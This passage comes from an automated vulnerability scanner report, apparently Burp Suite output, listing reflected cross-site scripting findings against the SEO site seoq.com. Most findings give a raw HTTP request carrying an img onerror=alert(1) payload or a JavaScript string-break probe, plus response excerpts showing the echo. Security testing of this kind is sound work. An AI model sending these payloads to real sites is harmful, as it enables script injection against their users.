<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<title>SEO Diagnostics Tool</t
...[SNIP]...
<a href="http://www.seoq.com/quotient/2011/05/01/2838/N5a547"><img src=a onerror=alert(1)>e343fb66cd3" title="SEO Quotient for ">
...[SNIP]...

7.125. http://www.seoq.com/quotient/2011/05/01/2839/N [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.seoq.com
Path:   /quotient/2011/05/01/2839/N

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d6378'%3b3ce7bc260b was submitted in the REST URL parameter 5. This input was echoed as d6378';3ce7bc260b in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /quotient/2011/05/01/2839d6378'%3b3ce7bc260b/N HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:54:48 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=UTF-8
Content-Length: 54545


<pre class="cake-debug">
<a href='javascript:void(0);' onclick='document.getElementById("CakeStackTrace1").style.display = (document.getElementById("CakeStackTrace1").style.display == "none" ? "" : "
...[SNIP]...
<script type="text/javascript">    
$(function() {
$("#tabs").tabs();
});

function fbs_click() {u='http://www.seoq.com/quotient/2011/05/01/2839d6378';3ce7bc260b/N';t='facebook_status';window.open('http://www.facebook.com/sharer.php?u='+encodeURIComponent(u)+'&t='+encodeURIComponent(t),'sharer','toolbar=0,status=0,width=626,height=436');return false;}

...[SNIP]...

7.126. http://www.seoq.com/quotient/2011/05/01/2839/N [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /quotient/2011/05/01/2839/N

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d53cd"><img%20src%3da%20onerror%3dalert(1)>ac4bf715a48 was submitted in the REST URL parameter 5. This input was echoed as d53cd"><img src=a onerror=alert(1)>ac4bf715a48 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /quotient/2011/05/01/2839d53cd"><img%20src%3da%20onerror%3dalert(1)>ac4bf715a48/N HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:54:48 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=UTF-8
Content-Length: 56035


<pre class="cake-debug">
<a href='javascript:void(0);' onclick='document.getElementById("CakeStackTrace1").style.display = (document.getElementById("CakeStackTrace1").style.display == "none" ? "" : "
...[SNIP]...
<a href="http://www.seoq.com/quotient/2011/05/01/2839d53cd"><img src=a onerror=alert(1)>ac4bf715a48/N" title="SEO Quotient for ">
...[SNIP]...

7.127. http://www.seoq.com/quotient/2011/05/01/2839/N [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /quotient/2011/05/01/2839/N

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload c05b2<img%20src%3da%20onerror%3dalert(1)>194b8082eef was submitted in the REST URL parameter 5. This input was echoed as c05b2<img src=a onerror=alert(1)>194b8082eef in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /quotient/2011/05/01/2839c05b2<img%20src%3da%20onerror%3dalert(1)>194b8082eef/N HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:54:51 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=UTF-8
Content-Length: 55865


<pre class="cake-debug">
<a href='javascript:void(0);' onclick='document.getElementById("CakeStackTrace1").style.display = (document.getElementById("CakeStackTrace1").style.display == "none" ? "" : "
...[SNIP]...
< 2839c05b2<img src=a onerror=alert(1)>194b8082eef and
site_url LIKE 'N' ORDER BY `report_date` DESC LIMIT 2 </p>
...[SNIP]...

7.128. http://www.seoq.com/quotient/2011/05/01/2839/N [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /quotient/2011/05/01/2839/N

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 33d6f"><img%20src%3da%20onerror%3dalert(1)>4b93dd2f611 was submitted in the REST URL parameter 6. This input was echoed as 33d6f"><img src=a onerror=alert(1)>4b93dd2f611 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /quotient/2011/05/01/2839/N33d6f"><img%20src%3da%20onerror%3dalert(1)>4b93dd2f611 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:55:06 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5; expires=Mon, 09-May-2011 02:55:07 GMT; path=/quotient
Content-Type: text/html; charset=UTF-8
Content-Length: 48178

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<title>SEO Diagnostics Tool</t
...[SNIP]...
<a href="http://www.seoq.com/quotient/2011/05/01/2839/N33d6f"><img src=a onerror=alert(1)>4b93dd2f611" title="SEO Quotient for ">
...[SNIP]...

7.129. http://www.seoq.com/quotient/2011/05/01/2839/N [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.seoq.com
Path:   /quotient/2011/05/01/2839/N

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3f954'%3bec1f05c8dbb was submitted in the REST URL parameter 6. This input was echoed as 3f954';ec1f05c8dbb in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /quotient/2011/05/01/2839/N3f954'%3bec1f05c8dbb HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:55:07 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=UTF-8
Content-Length: 54542


<pre class="cake-debug">
<a href='javascript:void(0);' onclick='document.getElementById("CakeStackTrace1").style.display = (document.getElementById("CakeStackTrace1").style.display == "none" ? "" : "
...[SNIP]...
<script type="text/javascript">    
$(function() {
$("#tabs").tabs();
});

function fbs_click() {u='http://www.seoq.com/quotient/2011/05/01/2839/N3f954';ec1f05c8dbb';t='facebook_status';window.open('http://www.facebook.com/sharer.php?u='+encodeURIComponent(u)+'&t='+encodeURIComponent(t),'sharer','toolbar=0,status=0,width=626,height=436');return false;}

...[SNIP]...

7.130. http://www.seoq.com/quotient/2011/05/01/2839/N [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /quotient/2011/05/01/2839/N

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload d73b1<img%20src%3da%20onerror%3dalert(1)>cdb69d84558 was submitted in the REST URL parameter 6. This input was echoed as d73b1<img src=a onerror=alert(1)>cdb69d84558 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /quotient/2011/05/01/2839/Nd73b1<img%20src%3da%20onerror%3dalert(1)>cdb69d84558 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:55:10 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5; expires=Mon, 09-May-2011 02:55:10 GMT; path=/quotient
Content-Type: text/html; charset=UTF-8
Content-Length: 48054

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<title>SEO Diagnostics Tool</t
...[SNIP]...
<img src=a onerror=alert(1)>cdb69d84558" title="SEO Quotient for ">http://www.seoq.com/quotient/2011/05/01/2839/Nd73b1<img src=a onerror=alert(1)>cdb69d84558ddd</a>
...[SNIP]...

7.131. http://www.seoq.com/quotient/2011/05/01/2840/N [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /quotient/2011/05/01/2840/N

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 59bfb<img%20src%3da%20onerror%3dalert(1)>e704d38e1db was submitted in the REST URL parameter 5. This input was echoed as 59bfb<img src=a onerror=alert(1)>e704d38e1db in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /quotient/2011/05/01/284059bfb<img%20src%3da%20onerror%3dalert(1)>e704d38e1db/N HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:54:37 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=UTF-8
Content-Length: 55865


<pre class="cake-debug">
<a href='javascript:void(0);' onclick='document.getElementById("CakeStackTrace1").style.display = (document.getElementById("CakeStackTrace1").style.display == "none" ? "" : "
...[SNIP]...
< 284059bfb<img src=a onerror=alert(1)>e704d38e1db and
site_url LIKE 'N' ORDER BY `report_date` DESC LIMIT 2 </p>
...[SNIP]...

7.132. http://www.seoq.com/quotient/2011/05/01/2840/N [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.seoq.com
Path:   /quotient/2011/05/01/2840/N

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 72362'%3bc275c5ef75a was submitted in the REST URL parameter 5. This input was echoed as 72362';c275c5ef75a in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /quotient/2011/05/01/284072362'%3bc275c5ef75a/N HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:54:32 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=UTF-8
Content-Length: 54591


<pre class="cake-debug">
<a href='javascript:void(0);' onclick='document.getElementById("CakeStackTrace1").style.display = (document.getElementById("CakeStackTrace1").style.display == "none" ? "" : "
...[SNIP]...
<script type="text/javascript">    
$(function() {
$("#tabs").tabs();
});

function fbs_click() {u='http://www.seoq.com/quotient/2011/05/01/284072362';c275c5ef75a/N';t='facebook_status';window.open('http://www.facebook.com/sharer.php?u='+encodeURIComponent(u)+'&t='+encodeURIComponent(t),'sharer','toolbar=0,status=0,width=626,height=436');return false;}

...[SNIP]...

7.133. http://www.seoq.com/quotient/2011/05/01/2840/N [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /quotient/2011/05/01/2840/N

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d076a"><img%20src%3da%20onerror%3dalert(1)>64f6b0d310c was submitted in the REST URL parameter 5. This input was echoed as d076a"><img src=a onerror=alert(1)>64f6b0d310c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /quotient/2011/05/01/2840d076a"><img%20src%3da%20onerror%3dalert(1)>64f6b0d310c/N HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:54:32 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=UTF-8
Content-Length: 56035


<pre class="cake-debug">
<a href='javascript:void(0);' onclick='document.getElementById("CakeStackTrace1").style.display = (document.getElementById("CakeStackTrace1").style.display == "none" ? "" : "
...[SNIP]...
<a href="http://www.seoq.com/quotient/2011/05/01/2840d076a"><img src=a onerror=alert(1)>64f6b0d310c/N" title="SEO Quotient for ">
...[SNIP]...

7.134. http://www.seoq.com/quotient/2011/05/01/2840/N [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /quotient/2011/05/01/2840/N

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload caa13<img%20src%3da%20onerror%3dalert(1)>b022926bb8 was submitted in the REST URL parameter 6. This input was echoed as caa13<img src=a onerror=alert(1)>b022926bb8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /quotient/2011/05/01/2840/Ncaa13<img%20src%3da%20onerror%3dalert(1)>b022926bb8 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:54:56 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5; expires=Mon, 09-May-2011 02:54:56 GMT; path=/quotient
Content-Type: text/html; charset=UTF-8
Content-Length: 48012

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<title>SEO Diagnostics Tool</t
...[SNIP]...
<img src=a onerror=alert(1)>b022926bb8" title="SEO Quotient for ">http://www.seoq.com/quotient/2011/05/01/2840/Ncaa13<img src=a onerror=alert(1)>b022926bb8ddd</a>
...[SNIP]...

7.135. http://www.seoq.com/quotient/2011/05/01/2840/N [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.seoq.com
Path:   /quotient/2011/05/01/2840/N

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 42fd0'%3ba1480315da was submitted in the REST URL parameter 6. This input was echoed as 42fd0';a1480315da in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /quotient/2011/05/01/2840/N42fd0'%3ba1480315da HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:54:53 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=UTF-8
Content-Length: 54494


<pre class="cake-debug">
<a href='javascript:void(0);' onclick='document.getElementById("CakeStackTrace1").style.display = (document.getElementById("CakeStackTrace1").style.display == "none" ? "" : "
...[SNIP]...
<script type="text/javascript">    
$(function() {
$("#tabs").tabs();
});

function fbs_click() {u='http://www.seoq.com/quotient/2011/05/01/2840/N42fd0';a1480315da';t='facebook_status';window.open('http://www.facebook.com/sharer.php?u='+encodeURIComponent(u)+'&t='+encodeURIComponent(t),'sharer','toolbar=0,status=0,width=626,height=436');return false;}

...[SNIP]...

7.136. http://www.seoq.com/quotient/2011/05/01/2840/N [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /quotient/2011/05/01/2840/N

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5af28"><img%20src%3da%20onerror%3dalert(1)>658ceb1f789 was submitted in the REST URL parameter 6. This input was echoed as 5af28"><img src=a onerror=alert(1)>658ceb1f789 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /quotient/2011/05/01/2840/N5af28"><img%20src%3da%20onerror%3dalert(1)>658ceb1f789 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:54:53 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5; expires=Mon, 09-May-2011 02:54:53 GMT; path=/quotient
Content-Type: text/html; charset=UTF-8
Content-Length: 48178

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<title>SEO Diagnostics Tool</t
...[SNIP]...
<a href="http://www.seoq.com/quotient/2011/05/01/2840/N5af28"><img src=a onerror=alert(1)>658ceb1f789" title="SEO Quotient for ">
...[SNIP]...

7.137. http://www.seoq.com/quotient/2011/05/01/2841/N [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.seoq.com
Path:   /quotient/2011/05/01/2841/N

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 26638'%3b4294ddce47c was submitted in the REST URL parameter 5. This input was echoed as 26638';4294ddce47c in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /quotient/2011/05/01/284126638'%3b4294ddce47c/N HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:54:07 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=UTF-8
Content-Length: 54591


<pre class="cake-debug">
<a href='javascript:void(0);' onclick='document.getElementById("CakeStackTrace1").style.display = (document.getElementById("CakeStackTrace1").style.display == "none" ? "" : "
...[SNIP]...
<script type="text/javascript">    
$(function() {
$("#tabs").tabs();
});

function fbs_click() {u='http://www.seoq.com/quotient/2011/05/01/284126638';4294ddce47c/N';t='facebook_status';window.open('http://www.facebook.com/sharer.php?u='+encodeURIComponent(u)+'&t='+encodeURIComponent(t),'sharer','toolbar=0,status=0,width=626,height=436');return false;}

...[SNIP]...

7.138. http://www.seoq.com/quotient/2011/05/01/2841/N [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /quotient/2011/05/01/2841/N

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 38226<img%20src%3da%20onerror%3dalert(1)>ac631b92e88 was submitted in the REST URL parameter 5. This input was echoed as 38226<img src=a onerror=alert(1)>ac631b92e88 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /quotient/2011/05/01/284138226<img%20src%3da%20onerror%3dalert(1)>ac631b92e88/N HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:54:10 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=UTF-8
Content-Length: 55865


<pre class="cake-debug">
<a href='javascript:void(0);' onclick='document.getElementById("CakeStackTrace1").style.display = (document.getElementById("CakeStackTrace1").style.display == "none" ? "" : "
...[SNIP]...
< 284138226<img src=a onerror=alert(1)>ac631b92e88 and
site_url LIKE 'N' ORDER BY `report_date` DESC LIMIT 2 </p>
...[SNIP]...

7.139. http://www.seoq.com/quotient/2011/05/01/2841/N [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /quotient/2011/05/01/2841/N

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a354b"><img%20src%3da%20onerror%3dalert(1)>cfb2573f01d was submitted in the REST URL parameter 5. This input was echoed as a354b"><img src=a onerror=alert(1)>cfb2573f01d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /quotient/2011/05/01/2841a354b"><img%20src%3da%20onerror%3dalert(1)>cfb2573f01d/N HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:54:06 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=UTF-8
Content-Length: 56035


<pre class="cake-debug">
<a href='javascript:void(0);' onclick='document.getElementById("CakeStackTrace1").style.display = (document.getElementById("CakeStackTrace1").style.display == "none" ? "" : "
...[SNIP]...
<a href="http://www.seoq.com/quotient/2011/05/01/2841a354b"><img src=a onerror=alert(1)>cfb2573f01d/N" title="SEO Quotient for ">
...[SNIP]...

7.140. http://www.seoq.com/quotient/2011/05/01/2841/N [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.seoq.com
Path:   /quotient/2011/05/01/2841/N

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2ec04'%3b0a71d25a67d was submitted in the REST URL parameter 6. This input was echoed as 2ec04';0a71d25a67d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /quotient/2011/05/01/2841/N2ec04'%3b0a71d25a67d HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
